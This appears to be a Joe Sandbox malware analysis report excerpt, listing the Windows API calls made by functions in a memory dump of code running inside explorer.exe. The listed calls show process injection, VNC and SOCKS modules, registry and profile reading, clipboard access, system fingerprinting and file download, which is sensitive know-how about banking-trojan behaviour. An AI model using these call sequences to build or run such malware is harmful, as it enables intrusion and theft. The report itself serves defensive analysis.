Part of subcall function 01B633BB: HeapFree.KERNEL32(00000000,00000000,01B64BB2), ref: 01B633CE

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B6A3B1, Relevance: 9.2, APIs: 6, Instructions: 153

APIs

EnterCriticalSection.KERNEL32(01B73F24), ref: 01B6A3C2
LeaveCriticalSection.KERNEL32(01B73F24), ref: 01B6A425

Part of subcall function 01B6A298: ResetEvent.KERNEL32(?), ref: 01B6A2A6
Part of subcall function 01B6A298: InternetSetStatusCallbackW.WININET(?,01B6A24F), ref: 01B6A2DB
Part of subcall function 01B6A298: InternetReadFileExA.WININET ref: 01B6A31B
Part of subcall function 01B6A298: GetLastError.KERNEL32 ref: 01B6A325
Part of subcall function 01B6A298: InternetSetStatusCallbackW.WININET(?,?), ref: 01B6A389

EnterCriticalSection.KERNEL32(01B73F24), ref: 01B6A442
GetUrlCacheEntryInfoW.WININET(?,00000000,000000FF), ref: 01B6A4C6

Part of subcall function 01B6856B: CreateFileW.KERNEL32(01B64E95,40000000,00000001,00000000,00000002,00000080,00000000), ref: 01B68585
Part of subcall function 01B6856B: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 01B685A8
Part of subcall function 01B6856B: CloseHandle.KERNEL32(00000000), ref: 01B685B5

Part of subcall function 01B633BB: HeapFree.KERNEL32(00000000,00000000,01B64BB2), ref: 01B633CE

Part of subcall function 01B654F1: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 01B65505
Part of subcall function 01B654F1: GetLastError.KERNEL32 ref: 01B6550F
Part of subcall function 01B654F1: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 01B6552F

Part of subcall function 01B614C3: InternetCrackUrlA.WININET ref: 01B617AC
Part of subcall function 01B614C3: GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 01B617CA
Part of subcall function 01B614C3: GetLocalTime.KERNEL32(?,?,?,00000000,00000001,?), ref: 01B618E4
Part of subcall function 01B614C3: EnterCriticalSection.KERNEL32(01B72AC8), ref: 01B61910
Part of subcall function 01B614C3: LeaveCriticalSection.KERNEL32(01B72AC8,?,?), ref: 01B6194D

Part of subcall function 01B6338B: HeapAlloc.KERNEL32(00000008,-00000004,01B64B59,00000000,?,?,?,01B61E08,00000000,01B622ED,?,?,00000000), ref: 01B6339C

SetLastError.KERNEL32(00002EE4), ref: 01B6A51C
LeaveCriticalSection.KERNEL32(01B73F24), ref: 01B6A585

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B5929D, Relevance: 9.1, APIs: 6, Instructions: 148

APIs

Part of subcall function 01B6338B: HeapAlloc.KERNEL32(00000008,-00000004,01B64B59,00000000,?,?,?,01B61E08,00000000,01B622ED,?,?,00000000), ref: 01B6339C

GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 01B592D4
StrStrIW.SHLWAPI(?,?), ref: 01B5935C
StrStrIW.SHLWAPI(?,?), ref: 01B5936D
GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 01B59389
GetPrivateProfileStringW.KERNEL32(?,?,00000000,-000001FE,000000FF,?), ref: 01B593A7
GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 01B593C1

Part of subcall function 01B640AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 01B640CF

Part of subcall function 01B633BB: HeapFree.KERNEL32(00000000,00000000,01B64BB2), ref: 01B633CE

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B61049, Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 395

APIs

EnterCriticalSection.KERNEL32(01B72AC8), ref: 01B61064
LeaveCriticalSection.KERNEL32(01B72AC8), ref: 01B610E7
InternetCrackUrlA.WININET(?,?,00000000,?), ref: 01B611B2

Part of subcall function 01B6AE54: EnterCriticalSection.KERNEL32(01B73FB4,?,01B611CF,?), ref: 01B6AE5B
Part of subcall function 01B6AE54: LeaveCriticalSection.KERNEL32(01B73FB4), ref: 01B6AE90

Part of subcall function 01B6AE9A: EnterCriticalSection.KERNEL32(01B73FB4,?,00000000,01B613AE,00000000), ref: 01B6AEA6
Part of subcall function 01B6AE9A: LeaveCriticalSection.KERNEL32(01B73FB4), ref: 01B6AEF1

InternetCrackUrlA.WININET(?,00000010,00000000,?), ref: 01B613EC

Part of subcall function 01B633BB: HeapFree.KERNEL32(00000000,00000000,01B64BB2), ref: 01B633CE

Part of subcall function 01B60AA1: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 01B60C73
Part of subcall function 01B60AA1: RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 01B60C93
Part of subcall function 01B60AA1: RegCloseKey.ADVAPI32(?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 01B60CA6
Part of subcall function 01B60AA1: GetLocalTime.KERNEL32(?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 01B60CB5

Part of subcall function 01B69B3E: CreateMutexW.KERNEL32(Function_00022C30,00000000,01B73F40,?,?,?,01B579E5), ref: 01B69B66

Strings

, xrefs: 01B61301

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B6D325, Relevance: 9.1, APIs: 6, Instructions: 78

APIs

Part of subcall function 01B62828: PathRenameExtensionW.SHLWAPI(?,.dat), ref: 01B628A1

PathRemoveFileSpecW.SHLWAPI(?), ref: 01B6D34A
PathRemoveFileSpecW.SHLWAPI(?), ref: 01B6D35D

Part of subcall function 01B6C86B: SetEvent.KERNEL32(01B6D36D,00000000), ref: 01B6C871
Part of subcall function 01B6C86B: WaitForSingleObject.KERNEL32(0000064C,000000FF), ref: 01B6C884

Part of subcall function 01B5BCAF: SHDeleteValueW.SHLWAPI(80000001,?,?), ref: 01B5BCEC
Part of subcall function 01B5BCAF: Sleep.KERNEL32(000001F4), ref: 01B5BCFB
Part of subcall function 01B5BCAF: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?), ref: 01B5BD11

Part of subcall function 01B68A29: FindFirstFileW.KERNEL32(?,?,?,?), ref: 01B68A5A
Part of subcall function 01B68A29: FindNextFileW.KERNEL32(00000000,?), ref: 01B68AB5
Part of subcall function 01B68A29: FindClose.KERNEL32(00000000), ref: 01B68AC0
Part of subcall function 01B68A29: SetFileAttributesW.KERNEL32(?,00000080,?,?), ref: 01B68ACC
Part of subcall function 01B68A29: RemoveDirectoryW.KERNEL32(?), ref: 01B68AD3

SHDeleteKeyW.SHLWAPI(80000001,?,00000003,00000000), ref: 01B6D39B
CharToOemW.USER32(?,?), ref: 01B6D3B7
CharToOemW.USER32(?,?), ref: 01B6D3C6

Part of subcall function 01B640F2: wvnsprintfA.SHLWAPI(?,0000026C,?,?), ref: 01B6410D

ExitProcess.KERNEL32(00000000), ref: 01B6D41C

Part of subcall function 01B64E7B: CharToOemW.USER32(?,?), ref: 01B64EAB
Part of subcall function 01B64E7B: GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,?,?,00000000,00000000), ref: 01B64F2F

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B651FD, Relevance: 9.1, APIs: 6, Instructions: 74

APIs

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 01B6521D

Part of subcall function 01B6338B: HeapAlloc.KERNEL32(00000008,-00000004,01B64B59,00000000,?,?,?,01B61E08,00000000,01B622ED,?,?,00000000), ref: 01B6339C

WaitForSingleObject.KERNEL32(?,00000000), ref: 01B6524B
InternetReadFile.WININET(00001000,?,00001000,?), ref: 01B65267
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 01B65282
FlushFileBuffers.KERNEL32(00000000), ref: 01B652A2

Part of subcall function 01B633BB: HeapFree.KERNEL32(00000000,00000000,01B64BB2), ref: 01B633CE

CloseHandle.KERNEL32(00000000), ref: 01B652B5

Part of subcall function 01B68716: SetFileAttributesW.KERNEL32(00000080,00000080,01B6B4CD,?), ref: 01B6871F
Part of subcall function 01B68716: DeleteFileW.KERNEL32(?), ref: 01B68729

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B67AF0, Relevance: 9.1, APIs: 6, Instructions: 72

APIs

WindowFromPoint.USER32(?,?), ref: 01B67B0C
SendMessageTimeoutW.USER32(00000000,00000084,00000000,?,00000002,?,?), ref: 01B67B3D
GetWindowLongW.USER32(00000000,000000F0), ref: 01B67B61
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 01B67B72
GetWindowLongW.USER32(?,000000F0), ref: 01B67B8F
SetWindowLongW.USER32(?,000000F0,00000000), ref: 01B67B9D

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B685D0, Relevance: 9.1, APIs: 6, Instructions: 68

APIs

CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000), ref: 01B685F5
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,01B62D27,?,?,00000000), ref: 01B68608
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,01B62D27,?,?,00000000), ref: 01B68630
ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 01B68648
VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,01B62D27,?,?,00000000), ref: 01B68662
CloseHandle.KERNEL32(?), ref: 01B6866B

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B55A94, Relevance: 9.1, APIs: 6, Instructions: 54

APIs

GetUpdateRgn.USER32(?,?,?), ref: 01B55B1C

Part of subcall function 01B6262D: WaitForSingleObject.KERNEL32(00000000,01B5776D), ref: 01B62635

TlsGetValue.KERNEL32 ref: 01B55AB4
SetRectRgn.GDI32(?,?,?,?,?), ref: 01B55AD4
SaveDC.GDI32(?), ref: 01B55AE4
SendMessageW.USER32(?,00000014,?,00000000), ref: 01B55AF4
RestoreDC.GDI32(?,00000000), ref: 01B55B06

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B64660, Relevance: 9.1, APIs: 6, Instructions: 53

APIs

CryptAcquireContextW.ADVAPI32(01B68C87,00000000,00000000,00000001,F0000040,?,01B68C87,?,00000030,?,?,?,01B691A0,01B73EC0), ref: 01B64679
CryptCreateHash.ADVAPI32(01B68C87,00008003,00000000,00000000,00000030,?,01B68C87,?,00000030,?,?,?,01B691A0,01B73EC0), ref: 01B64691
CryptHashData.ADVAPI32(00000030,00000010,01B68C87,00000000,?,01B68C87), ref: 01B646AD
CryptGetHashParam.ADVAPI32(00000030,00000002,00000030,00000010,00000000,?,01B68C87), ref: 01B646C5
CryptDestroyHash.ADVAPI32(00000030,?,01B68C87), ref: 01B646DC
CryptReleaseContext.ADVAPI32(01B68C87,00000000,?,01B68C87,?,00000030,?,?,?,01B691A0,01B73EC0), ref: 01B646E6

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B56010, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 189

APIs

GetTickCount.KERNEL32(0000271B,00020000,?,00002719,00020000,?,?,00000000,00000000), ref: 01B5610F
GetUserNameExW.SECUR32(00000002,?,00000104), ref: 01B561E6

Part of subcall function 01B570A6: GetVersionExW.KERNEL32(?,00000002,00000000,00000006), ref: 01B570CA
Part of subcall function 01B570A6: GetNativeSystemInfo.KERNEL32(?), ref: 01B570D8

GetUserDefaultUILanguage.KERNEL32(0000271C,00020000,00000002,?,00000000,00000000), ref: 01B56162
GetModuleFileNameW.KERNEL32(00000000,?,00000103,?,00000000,00000000), ref: 01B561A4

Part of subcall function 01B633BB: HeapFree.KERNEL32(00000000,00000000,01B64BB2), ref: 01B633CE

Part of subcall function 01B634BD: GetSystemTime.KERNEL32(?,?,?,01B560C8,?,00000000,00000000), ref: 01B634C7
Part of subcall function 01B634BD: SystemTimeToFileTime.KERNEL32(?,00000000,?,?,01B560C8,?,00000000,00000000), ref: 01B634D5

Part of subcall function 01B634E5: GetTimeZoneInformation.KERNEL32(?), ref: 01B634F4

Strings

, xrefs: 01B56218

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B57125, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 64

APIs

ConvertSidToStringSidW.ADVAPI32(?,?), ref: 01B57138

Part of subcall function 01B640AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 01B640CF

LocalFree.KERNEL32(?,.exe,00000000), ref: 01B571C0

Part of subcall function 01B674DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,01B57194,?,?,00000104,.exe,00000000), ref: 01B674F4
Part of subcall function 01B674DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,01B57194,?,?,00000104), ref: 01B67575

PathUnquoteSpacesW.SHLWAPI(?), ref: 01B571A0
ExpandEnvironmentStringsW.KERNEL32(?,01B6D23A,00000104), ref: 01B571AD

Strings

.exe, xrefs: 01B57147

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B64F8F, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46

APIs

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 01B64FA6
InternetSetOptionA.WININET(00000000,00000002,01B7200C,00000004), ref: 01B64FC5
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 01B64FE2
InternetCloseHandle.WININET(00000000), ref: 01B64FEE

Strings

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1), xrefs: 01B64F97, 01B64FA5

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B65403, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44

APIs

LoadLibraryA.KERNEL32(urlmon.dll), ref: 01B65414
GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 01B65427
FreeLibrary.KERNEL32(?), ref: 01B65479

Strings

ObtainUserAgentString, xrefs: 01B65421
urlmon.dll, xrefs: 01B6540D

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B5748F, Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 207

APIs

lstrcmpiA.KERNEL32(?,socks,?,00000000,00000104), ref: 01B574BE
lstrcmpiA.KERNEL32(?,vnc), ref: 01B574D1

Part of subcall function 01B67425: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 01B67444
Part of subcall function 01B67425: CloseHandle.KERNEL32(?), ref: 01B67450

Part of subcall function 01B67477: SetLastError.KERNEL32(0000009B,01B62AC8,00000000,01B5BB5F,00000000,01B72AF0,00000000,00000104,76C605D7,00000000), ref: 01B67481
Part of subcall function 01B67477: CreateThread.KERNEL32(00000000,01B72AF0,01B72AF0,01B72AF0,00000000,00000000), ref: 01B674A4

Part of subcall function 01B6675E: shutdown.WS2_32(?,00000002), ref: 01B66766
Part of subcall function 01B6675E: #3.WS2_32(?), ref: 01B6676D

Part of subcall function 01B674BC: WaitForMultipleObjects.KERNEL32(?,01B72AEC,00000001,000000FF), ref: 01B674CE

CloseHandle.KERNEL32(?), ref: 01B576EE

Part of subcall function 01B633BB: HeapFree.KERNEL32(00000000,00000000,01B64BB2), ref: 01B633CE

Part of subcall function 01B66B8E: ReleaseMutex.KERNEL32(00000000,01B63021,?,?,?), ref: 01B66B92

Part of subcall function 01B66444: getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 01B66463
Part of subcall function 01B66444: freeaddrinfo.WS2_32(?,?,?,?,?,01B57284,?), ref: 01B664B0

Part of subcall function 01B667B6: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 01B667CC

Part of subcall function 01B66774: WSAIoctl.WS2_32(?,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 01B667A7

Part of subcall function 01B6666B: select.WS2_32(00000000,?,00000000,00000000,00000001), ref: 01B666EA
Part of subcall function 01B6666B: WSASetLastError.WS2_32(0000274C), ref: 01B666F9

Part of subcall function 01B6636E: recv.WS2_32(?,?,00000001,00000000), ref: 01B66392

Part of subcall function 01B6338B: HeapAlloc.KERNEL32(00000008,-00000004,01B64B59,00000000,?,?,?,01B61E08,00000000,01B622ED,?,?,00000000), ref: 01B6339C

Strings

vnc, xrefs: 01B574CA
socks, xrefs: 01B574B7

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B59D55, Relevance: 7.7, APIs: 5, Instructions: 202

APIs

Part of subcall function 01B6338B: HeapAlloc.KERNEL32(00000008,-00000004,01B64B59,00000000,?,?,?,01B61E08,00000000,01B622ED,?,?,00000000), ref: 01B6339C

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008), ref: 01B59E0C
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 01B59E37
RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?,?,?,000000FF,?,?,000000FF,?,?,000000FF), ref: 01B59ED7

Part of subcall function 01B640AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 01B640CF

Part of subcall function 01B67607: RegQueryValueExW.KERNEL32(?,?,00000000,?,01B69E26,?,?,?,01B675CD,?,?,00000000,00000004,?), ref: 01B6761F
Part of subcall function 01B67607: RegCloseKey.KERNEL32(?,?,01B675CD,?,?,00000000,00000004,?,?,?,?,01B69E26,?,?), ref: 01B6762D

RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF), ref: 01B59F7A
RegCloseKey.ADVAPI32(?), ref: 01B59F8D

Part of subcall function 01B633BB: HeapFree.KERNEL32(00000000,00000000,01B64BB2), ref: 01B633CE

Part of subcall function 01B674DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,01B57194,?,?,00000104,.exe,00000000), ref: 01B674F4
Part of subcall function 01B674DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,01B57194,?,?,00000104), ref: 01B67575

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B58E1B, Relevance: 7.7, APIs: 5, Instructions: 158

APIs

Part of subcall function 01B68C40: PathCombineW.SHLWAPI(01B61F45,01B61F45,?), ref: 01B68C5F

Part of subcall function 01B6338B: HeapAlloc.KERNEL32(00000008,-00000004,01B64B59,00000000,?,?,?,01B61E08,00000000,01B622ED,?,?,00000000), ref: 01B6339C

GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 01B58E82
GetPrivateProfileStringW.KERNEL32(00000000,?,00000000,000000FF,000000FF,?), ref: 01B58F16
GetPrivateProfileIntW.KERNEL32(00000015,?,00000015,?), ref: 01B58F34
GetPrivateProfileStringW.KERNEL32(00000000,?,00000000,?,000000FF,?), ref: 01B58F5F
GetPrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000,000000FF,?), ref: 01B58F7B

Part of subcall function 01B640AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 01B640CF

Part of subcall function 01B633BB: HeapFree.KERNEL32(00000000,00000000,01B64BB2), ref: 01B633CE

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B69224, Relevance: 7.6, APIs: 5, Instructions: 111

APIs

CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000004,00000080,00000000), ref: 01B69245

Part of subcall function 01B686EF: GetFileSizeEx.KERNEL32(?,?,?,?,?,01B56588,00000000), ref: 01B686FB

ReadFile.KERNEL32(?,?,00000005,00000000,00000000), ref: 01B69286
CloseHandle.KERNEL32(?), ref: 01B69292
ReadFile.KERNEL32(?,?,00000005,00000005,00000000), ref: 01B69301
SetEndOfFile.KERNEL32(?,?,?,?,00000000), ref: 01B69327

Part of subcall function 01B6869F: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000), ref: 01B686B1

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B69959, Relevance: 7.6, APIs: 5, Instructions: 99

APIs

Part of subcall function 01B6338B: HeapAlloc.KERNEL32(00000008,-00000004,01B64B59,00000000,?,?,?,01B61E08,00000000,01B622ED,?,?,00000000), ref: 01B6339C

GetDIBits.GDI32(00000000,01B5DE4B,00000000,00000001,00000000,00000000,00000000), ref: 01B69991
GetDIBits.GDI32(00000000,01B5DE4B,00000000,00000001,00000000,00000000,00000000), ref: 01B699A7
DeleteObject.GDI32(01B5DE4B), ref: 01B699B4
CreateDIBSection.GDI32(00000000,00000000,00000000,01B72888,?,?), ref: 01B69A24

Part of subcall function 01B633BB: HeapFree.KERNEL32(00000000,00000000,01B64BB2), ref: 01B633CE

DeleteObject.GDI32(01B5DE4B), ref: 01B69A43

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B6A298, Relevance: 7.6, APIs: 5, Instructions: 94

APIs

ResetEvent.KERNEL32(?), ref: 01B6A2A6

Part of subcall function 01B6338B: HeapAlloc.KERNEL32(00000008,-00000004,01B64B59,00000000,?,?,?,01B61E08,00000000,01B622ED,?,?,00000000), ref: 01B6339C

InternetSetStatusCallbackW.WININET(?,01B6A24F), ref: 01B6A2DB
InternetReadFileExA.WININET ref: 01B6A31B
GetLastError.KERNEL32 ref: 01B6A325

Part of subcall function 01B66B28: TranslateMessage.USER32(?), ref: 01B66B4A
Part of subcall function 01B66B28: DispatchMessageW.USER32(?), ref: 01B66B55
Part of subcall function 01B66B28: PeekMessageW.USER32(00000000), ref: 01B66B65
Part of subcall function 01B66B28: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 01B66B79

InternetSetStatusCallbackW.WININET(?,?), ref: 01B6A389

Part of subcall function 01B633BB: HeapFree.KERNEL32(00000000,00000000,01B64BB2), ref: 01B633CE

Part of subcall function 01B63346: HeapAlloc.KERNEL32(00000008,-00000003,01B636F5,?,?,00000000,01B641E1,?,01B62070,?,?,?,01B64191,?,?,?), ref: 01B63368
Part of subcall function 01B63346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,01B636F5,?,?,00000000,01B641E1,?,01B62070,?,?,?,01B64191,?,?), ref: 01B63379

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B6C49B, Relevance: 7.6, APIs: 5, Instructions: 85

APIs

Part of subcall function 01B6262D: WaitForSingleObject.KERNEL32(00000000,01B5776D), ref: 01B62635

GetProcessId.KERNEL32(?), ref: 01B6C509

Part of subcall function 01B6245B: CreateMutexW.KERNEL32(01B72C30,00000001,?,01B72E70,76C605D7,?,00000002,?,76C605D7), ref: 01B624A3
Part of subcall function 01B6245B: GetLastError.KERNEL32 ref: 01B624AF
Part of subcall function 01B6245B: CloseHandle.KERNEL32(00000000), ref: 01B624BD

Part of subcall function 01B62542: DuplicateHandle.KERNEL32(000000FF,?,00000000,?,00000000,00000000,00000002), ref: 01B62574
Part of subcall function 01B62542: WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,?,?,?,01B6316D,?,00000000,?,?,00000000), ref: 01B625AB
Part of subcall function 01B62542: WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,?,?,?,01B6316D,?,00000000,?,?,00000000), ref: 01B625CB
Part of subcall function 01B62542: VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000,00000000,?,00000000,?,?,?,?,01B6316D,?,00000000), ref: 01B6261A

GetThreadContext.KERNEL32 ref: 01B6C557
SetThreadContext.KERNEL32(00000000,00000000), ref: 01B6C596
VirtualFreeEx.KERNEL32(?,00000000,00000000,00008000), ref: 01B6C5AD
CloseHandle.KERNEL32(?), ref: 01B6C5B7

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B6B3EC, Relevance: 7.6, APIs: 5, Instructions: 85

APIs

Part of subcall function 01B68C40: PathCombineW.SHLWAPI(01B61F45,01B61F45,?), ref: 01B68C5F

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 01B6B437
WriteFile.KERNEL32(01B6B3D4,?,00000146,?,00000000), ref: 01B6B475
WriteFile.KERNEL32(01B6B3D4,?,00000000,?,00000000), ref: 01B6B499
FlushFileBuffers.KERNEL32(01B6B3D4), ref: 01B6B4AD
CloseHandle.KERNEL32(01B6B3D4), ref: 01B6B4B6

Part of subcall function 01B68716: SetFileAttributesW.KERNEL32(00000080,00000080,01B6B4CD,?), ref: 01B6871F
Part of subcall function 01B68716: DeleteFileW.KERNEL32(?), ref: 01B68729

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B55DFB, Relevance: 7.6, APIs: 5, Instructions: 80

APIs

GetWindowInfo.USER32(?,?), ref: 01B55E1A
IntersectRect.USER32(?,?), ref: 01B55E58
IsRectEmpty.USER32(?), ref: 01B55E6A
IntersectRect.USER32(?,?), ref: 01B55E81

Part of subcall function 01B55C8A: GetWindowThreadProcessId.USER32(?,?), ref: 01B55CB4
Part of subcall function 01B55C8A: ResetEvent.KERNEL32(00000010), ref: 01B55D03
Part of subcall function 01B55C8A: PostMessageW.USER32(?,?,?,00000010), ref: 01B55D26
Part of subcall function 01B55C8A: WaitForSingleObject.KERNEL32(00000010,00000064), ref: 01B55D35
Part of subcall function 01B55C8A: ResetEvent.KERNEL32(?,?,?,00000010), ref: 01B55D60
Part of subcall function 01B55C8A: PostThreadMessageW.USER32(?,?,000000FC,?), ref: 01B55D70
Part of subcall function 01B55C8A: WaitForSingleObject.KERNEL32(?,000003E8), ref: 01B55D82
Part of subcall function 01B55C8A: TerminateProcess.KERNEL32(?,00000000,?,00000010), ref: 01B55DA7
Part of subcall function 01B55C8A: IntersectRect.USER32(?,?), ref: 01B55DC7
Part of subcall function 01B55C8A: FillRect.USER32(?,?,00000006), ref: 01B55DD9
Part of subcall function 01B55C8A: DrawEdge.USER32(?,?,0000000A,0000000F), ref: 01B55DED

GetTopWindow.USER32(?), ref: 01B55EB1

Part of subcall function 01B67AC1: GetWindow.USER32(?,00000001), ref: 01B67AE3

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B6B062, Relevance: 7.6, APIs: 5, Instructions: 70

APIs

GetClipboardData.USER32(?), ref: 01B6B06B

